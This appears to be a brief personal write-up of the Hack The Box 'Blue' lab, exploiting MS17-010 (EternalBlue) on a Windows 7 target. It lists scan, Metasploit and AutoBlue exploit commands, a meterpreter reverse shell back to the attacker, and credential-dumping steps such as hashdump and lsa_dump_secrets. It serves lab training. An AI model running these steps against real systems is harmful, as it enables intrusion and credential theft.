Comment on page
Blue
HTB - 3. Blue (MS17.010)
- 1.
nmap -T4 -p- -A 10.10.10.40
shows 139 & 445 (smb) open, version Windows 7 Professional 7601 Service Pack 1, computer name is haris-PC, message signing enabled by not required, - 2.Metaploit Test if vulnerablesudo msfconsolesearch ms17-010use auxiliary/scanner/smb/smb_ms17_010optionsset rhosts 10.10.10.40runResult: Host is likely vulnerableExploit:use exploit/windows/smb/ms17_010_eternalblueset rhosts 10.10.10.40show targetsrunResult: shell popped with
nt authoirty/system
Used an un-staged payload, so lets try staged and get a meterpreterset payload windows/x64/meterpreter/reverse_tcpoptionsrungetuidsysinfohashdumpshellroute printarp -anetstat -anoload kiwihelpcreds_alllsa_dump_samlsa_dump_secretsload incognitolist_tokens -u - 3.Autoblue: https://github.com/3ndG4me/AutoBlue-MS17-010git clone https://github.com/3ndG4me/AutoBlue-MS17-010cd AutoBlue-MS17-010lspython eternalblue_checker.py 10.10.10.40Result: Target not patchedExploit:cd shellcodesudo ./shell_prep.shy10.10.14.24444544460 <-- Meterpreter instead of shell0 <-- Staged instead of un-stagedcd ..lssudo ./listener_prep.sh10.10.14.244445444600python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.binsessionssessions 1getuidwhoamisysinfo
Last modified 1yr ago